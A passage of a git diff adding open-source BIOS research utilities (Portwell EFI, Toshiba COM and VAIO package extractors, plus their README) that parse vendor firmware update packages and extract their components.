safe_name(mod_name)) + + # Account for potential duplicate file names + if os.path.isfile(mod_file): mod_file += f'_{entry_index + 1:02d}' + + # Save TDK Entry data to output file + with open(mod_file, 'wb') as out_file: + out_file.write(mod_data) + + return exit_code + +# Get ctypes Structure Sizes +TDK_HDR_LEN = ctypes.sizeof(PhoenixTdkHeader) +TDK_MOD_LEN = ctypes.sizeof(PhoenixTdkEntry) + +# Set placeholder TDK Entries Size +TDK_DUMMY_LEN = 0x200 + +if __name__ == '__main__': + BIOSUtility(TITLE, is_phoenix_tdk, phoenix_tdk_extract).run_utility() diff --git a/blobs/t480/biosutilities/Portwell_EFI_Extract.py b/blobs/t480/biosutilities/Portwell_EFI_Extract.py new file mode 100644 index 00000000..bb40705a --- /dev/null +++ b/blobs/t480/biosutilities/Portwell_EFI_Extract.py @@ -0,0 +1,136 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Portwell EFI Extract +Portwell EFI Update Extractor +Copyright (C) 2021-2022 Plato Mavropoulos +""" + +TITLE = 'Portwell EFI Update Extractor v2.0_a12' + +import os +import sys + +# Stop __pycache__ generation +sys.dont_write_bytecode = True + +from common.comp_efi import efi_decompress, is_efi_compressed +from common.path_ops import make_dirs, safe_name +from common.pe_ops import get_pe_file +from common.patterns import PAT_MICROSOFT_MZ, PAT_PORTWELL_EFI +from common.system import printer +from common.templates import BIOSUtility +from common.text_ops import file_to_bytes + +FILE_NAMES = { + 0 : 'Flash.efi', + 1 : 'Fparts.txt', + 2 : 'Update.nsh', + 3 : 'Temp.bin', + 4 : 'SaveDmiData.efi' + } + +# Check if input is Portwell EFI executable +def is_portwell_efi(in_file): + in_buffer = file_to_bytes(in_file) + + try: + pe_buffer = get_portwell_pe(in_buffer)[1] + except Exception: + pe_buffer = b'' + + is_mz = PAT_MICROSOFT_MZ.search(in_buffer[:0x2]) # EFI images start with PE Header MZ + + is_uu = PAT_PORTWELL_EFI.search(pe_buffer[:0x4]) # Portwell EFI files start with + + return bool(is_mz and is_uu) + +# Get PE of Portwell EFI executable +def get_portwell_pe(in_buffer): + pe_file = get_pe_file(in_buffer, fast=True) # Analyze EFI Portable Executable (PE) + + pe_data = in_buffer[pe_file.OPTIONAL_HEADER.SizeOfImage:] # Skip EFI executable (pylint: disable=E1101) + + return pe_file, pe_data + +# Parse & Extract Portwell UEFI Unpacker +def portwell_efi_extract(input_file, extract_path, padding=0): + efi_files = [] # Initialize EFI Payload file chunks + + input_buffer = file_to_bytes(input_file) + + make_dirs(extract_path, delete=True) + + pe_file,pe_data = get_portwell_pe(input_buffer) + + efi_title = get_unpacker_tag(input_buffer, pe_file) + + printer(efi_title, padding) + + # Split EFI Payload into file chunks + efi_list = list(PAT_PORTWELL_EFI.finditer(pe_data)) + for idx,val in enumerate(efi_list): + efi_bgn = val.end() + efi_end = len(pe_data) if idx == len(efi_list) - 1 else efi_list[idx + 1].start() + efi_files.append(pe_data[efi_bgn:efi_end]) + + parse_efi_files(extract_path, efi_files, padding) + +# Get Portwell UEFI Unpacker tag +def get_unpacker_tag(input_buffer, pe_file): + unpacker_tag_txt = 'UEFI Unpacker' + + for pe_section in pe_file.sections: + # Unpacker Tag, Version, Strings etc are found in .data PE section + if pe_section.Name.startswith(b'.data'): + pe_data_bgn = pe_section.PointerToRawData + pe_data_end = pe_data_bgn + pe_section.SizeOfRawData + + # Decode any valid UTF-16 .data PE section info to a parsable text buffer + pe_data_txt = input_buffer[pe_data_bgn:pe_data_end].decode('utf-16','ignore') + + # Search .data for UEFI Unpacker tag + unpacker_tag_bgn = pe_data_txt.find(unpacker_tag_txt) + if unpacker_tag_bgn != -1: + unpacker_tag_len = pe_data_txt[unpacker_tag_bgn:].find('=') + if unpacker_tag_len != -1: + unpacker_tag_end = unpacker_tag_bgn + unpacker_tag_len + unpacker_tag_raw = pe_data_txt[unpacker_tag_bgn:unpacker_tag_end] + + # Found full UEFI Unpacker tag, store and slightly beautify the resulting text + unpacker_tag_txt = unpacker_tag_raw.strip().replace(' ',' ').replace('<',' <') + + break # Found PE .data section, skip the rest + + return unpacker_tag_txt + +# Process Portwell UEFI Unpacker payload files +def parse_efi_files(extract_path, efi_files, padding): + for file_index,file_data in enumerate(efi_files): + if file_data in (b'', b'NULL'): + continue # Skip empty/unused files + + file_name = FILE_NAMES.get(file_index, f'Unknown_{file_index}.bin') # Assign Name to EFI file + + printer(f'[{file_index}] {file_name}', padding + 4) # Print EFI file name, indicate progress + + if file_name.startswith('Unknown_'): + printer(f'Note: Detected new Portwell EFI file ID {file_index}!', padding + 8, pause=True) # Report new EFI files + + file_path = os.path.join(extract_path, safe_name(file_name)) # Store EFI file output path + + with open(file_path, 'wb') as out_file: + out_file.write(file_data) # Store EFI file data to drive + + # Attempt to detect EFI compression & decompress when applicable + if is_efi_compressed(file_data): + comp_fname = file_path + '.temp' # Store temporary compressed file name + + os.replace(file_path, comp_fname) # Rename initial/compressed file + + if efi_decompress(comp_fname, file_path, padding + 8) == 0: + os.remove(comp_fname) # Successful decompression, delete compressed file + +if __name__ == '__main__': + BIOSUtility(TITLE, is_portwell_efi, portwell_efi_extract).run_utility() diff --git a/blobs/t480/biosutilities/README.md b/blobs/t480/biosutilities/README.md new file mode 100644 index 00000000..0d8c29c9 --- /dev/null +++ b/blobs/t480/biosutilities/README.md @@ -0,0 +1,552 @@ +# BIOSUtilities [Refactor - WIP] +**Various BIOS Utilities for Modding/Research** + +[BIOS Utilities News Feed](https://twitter.com/platomaniac) + +* [**AMI BIOS Guard Extractor**](#ami-bios-guard-extractor) +* [**AMI UCP Update Extractor**](#ami-ucp-update-extractor) +* [**Apple EFI IM4P Splitter**](#apple-efi-im4p-splitter) +* [**Apple EFI Image Identifier**](#apple-efi-image-identifier) +* [**Apple EFI Package Extractor**](#apple-efi-package-extractor) +* [**Apple EFI PBZX Extractor**](#apple-efi-pbzx-extractor) +* [**Award BIOS Module Extractor**](#award-bios-module-extractor) +* [**Dell PFS Update Extractor**](#dell-pfs-update-extractor) +* [**Fujitsu SFX BIOS Extractor**](#fujitsu-sfx-bios-extractor) +* [**Fujitsu UPC BIOS Extractor**](#fujitsu-upc-bios-extractor) +* [**Insyde iFlash/iFdPacker Extractor**](#insyde-iflashifdpacker-extractor) +* [**Panasonic BIOS Package Extractor**](#panasonic-bios-package-extractor) +* [**Phoenix TDK Packer Extractor**](#phoenix-tdk-packer-extractor) +* [**Portwell EFI Update Extractor**](#portwell-efi-update-extractor) +* [**Toshiba BIOS COM Extractor**](#toshiba-bios-com-extractor) +* [**VAIO Packaging Manager Extractor**](#vaio-packaging-manager-extractor) + +## **AMI BIOS Guard Extractor** + +![]() + +#### **Description** + +Parses AMI BIOS Guard (a.k.a. PFAT, Platform Firmware Armoring Technology) images, extracts their SPI/BIOS/UEFI firmware components and decompiles the Intel BIOS Guard Scripts. It supports all AMI PFAT revisions and formats, including those with Index Information tables or nested AMI PFAT structures. The output comprises only final firmware components which are directly usable by end users. + +Note that the AMI PFAT structure may not have an explicit component order. AMI's BIOS Guard Firmware Update Tool (AFUBGT) updates components based on the user/OEM provided Parameters and Options or Index Information table, when applicable. That means that merging all the components together does not usually yield a proper SPI/BIOS/UEFI image. The utility does generate such a merged file with the name "00 -- \\_ALL.bin" but it is up to the end user to determine its usefulness. Moreover, any custom OEM data after the AMI PFAT structure are additionally stored in the last file with the name "\ -- \_OOB.bin" and it is once again up to the end user to determine its usefulness. In cases where the trailing custom OEM data include a nested AMI PFAT structure, the utility will process and extract it automatically as well. + +#### **Usage** + +You can either Drag & Drop or manually enter AMI BIOS Guard (PFAT) image file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +Optionally, to decompile the AMI PFAT \> Intel BIOS Guard Scripts, you must have the following 3rd party utility at the "external" project directory: + +* [BIOS Guard Script Tool](https://github.com/platomav/BGScriptTool) (i.e. big_script_tool.py) + +#### **Pictures** + +![]() + +## **AMI UCP Update Extractor** + +![]() + +#### **Description** + +Parses AMI UCP (Utility Configuration Program) Update executables, extracts their firmware components (e.g. SPI/BIOS/UEFI, EC, ME etc) and shows all relevant info. It supports all AMI UCP revisions and formats, including those with nested AMI PFAT, AMI UCP or Insyde iFlash/iFdPacker structures. The output comprises only final firmware components and utilities which are directly usable by end users. + +#### **Usage** + +You can either Drag & Drop or manually enter AMI UCP Update executable file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts +* -c or --checksum : verify AMI UCP Checksums (slow) + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +To run the utility, you must have the following 3rd party tools at the "external" project directory: + +* [TianoCompress](https://github.com/tianocore/edk2/tree/master/BaseTools/Source/C/TianoCompress/) (i.e. [TianoCompress.exe for Windows](https://github.com/tianocore/edk2-BaseTools-win32/) or TianoCompress for Linux) +* [7-Zip Console](https://www.7-zip.org/) (i.e. 7z.exe for Windows or 7zzs for Linux) + +Optionally, to decompile the AMI UCP \> AMI PFAT \> Intel BIOS Guard Scripts (when applicable), you must have the following 3rd party utility at the "external" project directory: + +* [BIOS Guard Script Tool](https://github.com/platomav/BGScriptTool) (i.e. big_script_tool.py) + +#### **Pictures** + +![]() + +## **Apple EFI IM4P Splitter** + +![]() + +#### **Description** + +Parses Apple IM4P multi-EFI files and splits all detected EFI firmware into separate Intel SPI/BIOS images. The output comprises only final firmware components and utilities which are directly usable by end users. + +#### **Usage** + +You can either Drag & Drop or manually enter Apple EFI IM4P file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +To run the utility, you do not need any prerequisites. + +#### **Pictures** + +![]() + +## **Apple EFI Image Identifier** + +![]() + +#### **Description** + +Parses Apple EFI images and identifies them based on Intel's official $IBIOSI$ tag, which contains info such as Model, Version, Build, Date and Time. Optionally, the utility can rename the input Apple EFI image based on the retrieved $IBIOSI$ tag info, while also making sure to differentiate any EFI images with the same $IBIOSI$ tag (e.g. Production, Pre-Production) by appending a checksum of their data. + +#### **Usage** + +You can either Drag & Drop or manually enter Apple EFI image file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts +* -r or --rename : rename EFI image based on its tag + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +To run the utility, you must have the following 3rd party tools at the "external" project directory: + +* [UEFIFind](https://github.com/LongSoft/UEFITool/) (i.e. [UEFIFind.exe for Windows or UEFIFind for Linux](https://github.com/LongSoft/UEFITool/releases)) +* [UEFIExtract](https://github.com/LongSoft/UEFITool/) (i.e. [UEFIExtract.exe for Windows or UEFIExtract for Linux](https://github.com/LongSoft/UEFITool/releases)) + +#### **Pictures** + +![]() + +## **Apple EFI Package Extractor** + +![]() + +#### **Description** + +Parses Apple EFI PKG firmware packages (i.e. FirmwareUpdate.pkg, BridgeOSUpdateCustomer.pkg), extracts their EFI images, splits those in IM4P format and identifies/renames the final Intel SPI/BIOS images accordingly. The output comprises only final firmware components which are directly usable by end users. + +#### **Usage** + +You can either Drag & Drop or manually enter Apple EFI PKG package file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +To run the utility, you must have the following 3rd party tools at the "external" project directory: + +* [7-Zip Console](https://www.7-zip.org/) (i.e. 7z.exe for Windows or 7zzs for Linux) + +#### **Pictures** + +![]() + +## **Apple EFI PBZX Extractor** + +![]() + +#### **Description** + +Parses Apple EFI PBZX images, re-assembles their CPIO payload and extracts its firmware components (e.g. IM4P, EFI, Utilities, Scripts etc). It supports CPIO re-assembly from both Raw and XZ compressed PBZX Chunks. The output comprises only final firmware components and utilities which are directly usable by end users. + +#### **Usage** + +You can either Drag & Drop or manually enter Apple EFI PBZX image file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +To run the utility, you must have the following 3rd party tools at the "external" project directory: + +* [7-Zip Console](https://www.7-zip.org/) (i.e. 7z.exe for Windows or 7zzs for Linux) + +#### **Pictures** + +![]() + +## **Award BIOS Module Extractor** + +![]() + +#### **Description** + +Parses Award BIOS images and extracts their modules (e.g. RAID, MEMINIT, \_EN_CODE, awardext etc). It supports all Award BIOS image revisions and formats, including those which contain LZH compressed files. The output comprises only final firmware components which are directly usable by end users. + +#### **Usage** + +You can either Drag & Drop or manually enter Award BIOS image file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +To run the utility, you must have the following 3rd party tool at the "external" project directory: + +* [7-Zip Console](https://www.7-zip.org/) (i.e. 7z.exe for Windows or 7zzs for Linux) + +#### **Pictures** + +![]() + +## **Dell PFS Update Extractor** + +![]() + +#### **Description** + +Parses Dell PFS Update images and extracts their Firmware (e.g. SPI, BIOS/UEFI, EC, ME etc) and Utilities (e.g. Flasher etc) component sections. It supports all Dell PFS revisions and formats, including those which are originally LZMA compressed in ThinOS packages (PKG), ZLIB compressed or Intel BIOS Guard (PFAT) protected. The output comprises only final firmware components which are directly usable by end users. + +#### **Usage** + +You can either Drag & Drop or manually enter Dell PFS Update images(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts +* -a or --advanced : extract signatures and metadata +* -s or --structure : show PFS structure information + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +Optionally, to decompile the Intel BIOS Guard (PFAT) Scripts, you must have the following 3rd party utility at the "external" project directory: + +* [BIOS Guard Script Tool](https://github.com/platomav/BGScriptTool) (i.e. big_script_tool.py) + +#### **Pictures** + +![]() + +## **Fujitsu SFX BIOS Extractor** + +![]() + +#### **Description** + +Parses Fujitsu SFX BIOS images and extracts their obfuscated Microsoft CAB archived firmware (e.g. SPI, BIOS/UEFI, EC, ME etc) and utilities (e.g. WinPhlash, PHLASH.INI etc) components. The output comprises only final firmware components which are directly usable by end users. + +#### **Usage** + +You can either Drag & Drop or manually enter Fujitsu SFX BIOS image file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +To run the utility, you must have the following 3rd party tool at the "external" project directory: + +* [7-Zip Console](https://www.7-zip.org/) (i.e. 7z.exe for Windows or 7zzs for Linux) + +#### **Pictures** + +![]() + +## **Fujitsu UPC BIOS Extractor** + +![]() + +#### **Description** + +Parses Fujitsu UPC BIOS images and extracts their EFI compressed SPI/BIOS/UEFI firmware component. The output comprises only a final firmware component which is directly usable by end users. + +#### **Usage** + +You can either Drag & Drop or manually enter Fujitsu UPC BIOS image file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +To run the utility, you must have the following 3rd party tool at the "external" project directory: + +* [TianoCompress](https://github.com/tianocore/edk2/tree/master/BaseTools/Source/C/TianoCompress/) (i.e. [TianoCompress.exe for Windows](https://github.com/tianocore/edk2-BaseTools-win32/) or TianoCompress for Linux) + +#### **Pictures** + +![]() + +## **Insyde iFlash/iFdPacker Extractor** + +![]() + +#### **Description** + +Parses Insyde iFlash/iFdPacker Update images and extracts their firmware (e.g. SPI, BIOS/UEFI, EC, ME etc) and utilities (e.g. InsydeFlash, H2OFFT, FlsHook, iscflash, platform.ini etc) components. It supports all Insyde iFlash/iFdPacker revisions and formats, including those which are 7-Zip SFX 7z compressed in raw, obfuscated or password-protected form. The output comprises only final firmware components which are directly usable by end users. + +#### **Usage** + +You can either Drag & Drop or manually enter Insyde iFlash/iFdPacker Update image file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +To run the utility, you do not need any prerequisites. + +#### **Pictures** + +![]() + +## **Panasonic BIOS Package Extractor** + +![]() + +#### **Description** + +Parses Panasonic BIOS Package executables and extracts their firmware (e.g. SPI, BIOS/UEFI, EC etc) and utilities (e.g. winprom, configuration etc) components. It supports all Panasonic BIOS Package revisions and formats, including those which contain LZNT1 compressed files. The output comprises only final firmware components which are directly usable by end users. + +#### **Usage** + +You can either Drag & Drop or manually enter Panasonic BIOS Package executable file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +To run the utility, you must have the following 3rd party Python modules installed: + +* [pefile](https://pypi.org/project/pefile/) +* [lznt1](https://pypi.org/project/lznt1/) + +Moreover, you must have the following 3rd party tool at the "external" project directory: + +* [7-Zip Console](https://www.7-zip.org/) (i.e. 7z.exe for Windows or 7zzs for Linux) + +#### **Pictures** + +![]() + +## **Phoenix TDK Packer Extractor** + +![]() + +#### **Description** + +Parses Phoenix Tools Development Kit (TDK) Packer executables and extracts their firmware (e.g. SPI, BIOS/UEFI, EC etc) and utilities (e.g. WinFlash etc) components. It supports all Phoenix TDK Packer revisions and formats, including those which contain LZMA compressed files. The output comprises only final firmware components which are directly usable by end users. + +#### **Usage** + +You can either Drag & Drop or manually enter Phoenix Tools Development Kit (TDK) Packer executable file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +To run the utility, you must have the following 3rd party Python module installed: + +* [pefile](https://pypi.org/project/pefile/) + +#### **Pictures** + +![]() + +## **Portwell EFI Update Extractor** + +![]() + +#### **Description** + +Parses Portwell UEFI Unpacker EFI executables (usually named "Update.efi") and extracts their firmware (e.g. SPI, BIOS/UEFI, EC etc) and utilities (e.g. Flasher etc) components. It supports all known Portwell UEFI Unpacker revisions (v1.1, v1.2, v2.0) and formats (used, empty, null), including those which contain EFI compressed files. The output comprises only final firmware components and utilities which are directly usable by end users. + +#### **Usage** + +You can either Drag & Drop or manually enter Portwell UEFI Unpacker EFI executable file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +To run the utility, you must have the following 3rd party Python module installed: + +* [pefile](https://pypi.org/project/pefile/) + +> pip3 install pefile + +Moreover, you must have the following 3rd party tool at the "external" project directory: + +* [TianoCompress](https://github.com/tianocore/edk2/tree/master/BaseTools/Source/C/TianoCompress/) (i.e. [TianoCompress.exe for Windows](https://github.com/tianocore/edk2-BaseTools-win32/) or TianoCompress for Linux) + +#### **Pictures** + +![]() + +## **Toshiba BIOS COM Extractor** + +![]() + +#### **Description** + +Parses Toshiba BIOS COM images and extracts their raw or compressed SPI/BIOS/UEFI firmware component. This utility is basically an easy to use python wrapper around [ToshibaComExtractor by LongSoft](https://github.com/LongSoft/ToshibaComExtractor). The output comprises only a final firmware component which is directly usable by end users. + +#### **Usage** + +You can either Drag & Drop or manually enter Toshiba BIOS COM image file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +To run the utility, you must have the following 3rd party tool at the "external" project directory: + +* [ToshibaComExtractor](https://github.com/LongSoft/ToshibaComExtractor) (i.e. [comextract.exe for Windows or comextract for Linux](https://github.com/LongSoft/ToshibaComExtractor/releases)) + +#### **Pictures** + +![]() + +## **VAIO Packaging Manager Extractor** + +![]() + +#### **Description** + +Parses VAIO Packaging Manager executables and extracts their firmware (e.g. SPI, BIOS/UEFI, EC, ME etc), utilities (e.g. WBFLASH etc) and driver (audio, video etc) components. If direct extraction fails, it attempts to unlock the executable in order to run at all non-VAIO systems and allow the user to choose the extraction location. It supports all VAIO Packaging Manager revisions and formats, including those which contain obfuscated Microsoft CAB archives or obfuscated unlock values. The output comprises only final firmware components which are directly usable by end users. + +#### **Usage** + +You can either Drag & Drop or manually enter VAIO Packaging Manager executable file(s). Optional arguments: + +* -h or --help : show help message and exit +* -v or --version : show utility name and version +* -i or --input-dir : extract from given input directory +* -o or --output-dir : extract in given output directory +* -e or --auto-exit : skip all user action prompts + +#### **Compatibility** + +Should work at all Windows, Linux or macOS operating systems which have Python 3.10 support. + +#### **Prerequisites** + +To run the utility, you must have the following 3rd party tool at the "external" project directory: + +* [7-Zip Console](https://www.7-zip.org/) (i.e. 7z.exe for Windows or 7zzs for Linux) + +#### **Pictures** + +![]() \ No newline at end of file diff --git a/blobs/t480/biosutilities/Toshiba_COM_Extract.py b/blobs/t480/biosutilities/Toshiba_COM_Extract.py new file mode 100644 index 00000000..da6ee437 --- /dev/null +++ b/blobs/t480/biosutilities/Toshiba_COM_Extract.py @@ -0,0 +1,63 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Toshiba COM Extract +Toshiba BIOS COM Extractor +Copyright (C) 2018-2022 Plato Mavropoulos +""" + +TITLE = 'Toshiba BIOS COM Extractor v2.0_a4' + +import os +import sys +import subprocess + +# Stop __pycache__ generation +sys.dont_write_bytecode = True + +from common.externals import get_comextract_path +from common.path_ops import make_dirs, path_stem, path_suffixes +from common.patterns import PAT_TOSHIBA_COM +from common.system import printer +from common.templates import BIOSUtility +from common.text_ops import file_to_bytes + +# Check if input is Toshiba BIOS COM image +def is_toshiba_com(in_file): + buffer = file_to_bytes(in_file) + + is_ext = path_suffixes(in_file)[-1].upper() == '.COM' if os.path.isfile(in_file) else True + + is_com = PAT_TOSHIBA_COM.search(buffer) + + return is_ext and is_com + +# Parse & Extract Toshiba BIOS COM image +def toshiba_com_extract(input_file, extract_path, padding=0): + if not os.path.isfile(input_file): + printer('Error: Could not find input file path!', padding) + + return 1 + + make_dirs(extract_path, delete=True) + + output_name = path_stem(input_file) + output_file = os.path.join(extract_path, f'{output_name}.bin') + + try: + subprocess.run([get_comextract_path(), input_file, output_file], check=True, stdout=subprocess.DEVNULL) + + if not os.path.isfile(output_file): + raise Exception('EXTRACT_FILE_MISSING') + except Exception: + printer(f'Error: ToshibaComExtractor could not extract file {input_file}!', padding) + + return 2 + + printer(f'Succesfull {output_name} extraction via ToshibaComExtractor!', padding) + + return 0 + +if __name__ == '__main__': + BIOSUtility(TITLE, is_toshiba_com, toshiba_com_extract).run_utility() diff --git a/blobs/t480/biosutilities/VAIO_Package_Extract.py b/blobs/t480/biosutilities/VAIO_Package_Extract.py new file mode 100644 index 00000000..9bb49bfe --- /dev/null +++ b/blobs/t480/biosutilities/VAIO_Package_Extract.py @@ -0,0 +1,147 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +VAIO Package Extractor +VAIO Packaging Manager Extractor +Copyright (C) 2019-2022 Plato Mavropoulos +""" + +TITLE = 'VAIO Packaging Manager Extractor v3.0_a8' + +import os +import sys + +# Stop __pycache__ generation +sys.dont_write_bytecode = True + +from common.comp_szip import is_szip_supported, szip_decompress +from common.path_ops import make_dirs +from common.patterns import PAT_VAIO_CAB, PAT_VAIO_CFG, PAT_VAIO_CHK, PAT_VAIO_EXT +from common.system import printer +from common.templates import BIOSUtility +from common.text_ops import file_to_bytes + +# Check if input is VAIO Packaging Manager +def is_vaio_pkg(in_file): + buffer = file_to_bytes(in_file) + + return bool(PAT_VAIO_CFG.search(buffer)) + +# Extract VAIO Packaging Manager executable +def vaio_cabinet(name, buffer, extract_path, padding=0): + match_cab = PAT_VAIO_CAB.search(buffer) # Microsoft CAB Header XOR 0xFF + + if not match_cab: + return 1 + + printer('Detected obfuscated CAB archive!', padding) + + # Determine the Microsoft CAB image size + cab_size = int.from_bytes(buffer[match_cab.start() + 0x8:match_cab.start() + 0xC], 'little') # Get LE XOR-ed CAB size + xor_size = int.from_bytes(b'\xFF' * 0x4, 'little') # Create CAB size XOR value + cab_size ^= xor_size # Perform XOR 0xFF and get actual CAB size + + printer('Removing obfuscation...', padding + 4) + + # Determine the Microsoft CAB image Data + cab_data = int.from_bytes(buffer[match_cab.start():match_cab.start() + cab_size], 'big') # Get BE XOR-ed CAB data + xor_data = int.from_bytes(b'\xFF' * cab_size, 'big') # Create CAB data XOR value + cab_data = (cab_data ^ xor_data).to_bytes(cab_size, 'big') # Perform XOR 0xFF and get actual CAB data + + printer('Extracting archive...', padding + 4) + + cab_path = os.path.join(extract_path, f'{name}_Temporary.cab') + + with open(cab_path, 'wb') as cab_file: + cab_file.write(cab_data) # Create temporary CAB archive + + if is_szip_supported(cab_path, padding + 8, check=True): + if szip_decompress(cab_path, extract_path, 'CAB', padding + 8, check=True) == 0: + os.remove(cab_path) # Successful extraction, delete temporary CAB archive + else: + return 3 + else: + return 2 + + return 0 + +# Unlock VAIO Packaging Manager executable +def vaio_unlock(name, buffer, extract_path, padding=0): + match_cfg = PAT_VAIO_CFG.search(buffer) + + if not match_cfg: + return 1 + + printer('Attempting to Unlock executable!', padding) + + # Initialize VAIO Package Configuration file variables (assume overkill size of 0x500) + cfg_bgn,cfg_end,cfg_false,cfg_true = [match_cfg.start(), match_cfg.start() + 0x500, b'', b''] + + # Get VAIO Package Configuration file info, split at new_line and stop at payload DOS header (EOF) + cfg_info = buffer[cfg_bgn:cfg_end].split(b'\x0D\x0A\x4D\x5A')[0].replace(b'\x0D',b'').split(b'\x0A') + + printer('Retrieving True/False values...', padding + 4) + + # Determine VAIO Package Configuration file True & False values + for info in cfg_info: + if info.startswith(b'ExtractPathByUser='): + cfg_false = bytearray(b'0' if info[18:] in (b'0',b'1') else info[18:]) # Should be 0/No/False + if info.startswith(b'UseCompression='): + cfg_true = bytearray(b'1' if info[15:] in (b'0',b'1') else info[15:]) # Should be 1/Yes/True + + # Check if valid True/False values have been retrieved + if cfg_false == cfg_true or not cfg_false or not cfg_true: + printer('Error: Could not retrieve True/False values!', padding + 8) + return 2 + + printer('Adjusting UseVAIOCheck entry...', padding + 4) + + # Find and replace UseVAIOCheck entry from 1/Yes/True to 0/No/False + vaio_check = PAT_VAIO_CHK.search(buffer[cfg_bgn:]) + if vaio_check: + buffer[cfg_bgn + vaio_check.end():cfg_bgn + vaio_check.end() + len(cfg_true)] = cfg_false + else: + printer('Error: Could not find entry UseVAIOCheck!', padding + 8) + return 3 + + printer('Adjusting ExtractPathByUser entry...', padding + 4) + + # Find and replace ExtractPathByUser entry from 0/No/False to 1/Yes/True + user_path = PAT_VAIO_EXT.search(buffer[cfg_bgn:]) + if user_path: + buffer[cfg_bgn + user_path.end():cfg_bgn + user_path.end() + len(cfg_false)] = cfg_true + else: + printer('Error: Could not find entry ExtractPathByUser!', padding + 8) + return 4 + + printer('Storing unlocked executable...', padding + 4) + + # Store Unlocked VAIO Packaging Manager executable + if vaio_check and user_path: + unlock_path = os.path.join(extract_path, f'{name}_Unlocked.exe') + with open(unlock_path, 'wb') as unl_file: + unl_file.write(buffer) + + return 0 + +# Parse & Extract or Unlock VAIO Packaging Manager +def vaio_pkg_extract(input_file, extract_path, padding=0): + input_buffer = file_to_bytes(input_file) + + input_name = os.path.basename(input_file) + + make_dirs(extract_path, delete=True) + + if vaio_cabinet(input_name, input_buffer, extract_path, padding) == 0: + printer('Successfully Extracted!', padding) + elif vaio_unlock(input_name, bytearray(input_buffer), extract_path, padding) == 0: + printer('Successfully Unlocked!', padding) + else: + printer('Error: Failed to Extract or Unlock executable!', padding) + return 1 + + return 0 + +if __name__ == '__main__': + BIOSUtility(TITLE, is_vaio_pkg, vaio_pkg_extract).run_utility() diff --git a/blobs/t480/biosutilities/common/checksums.py 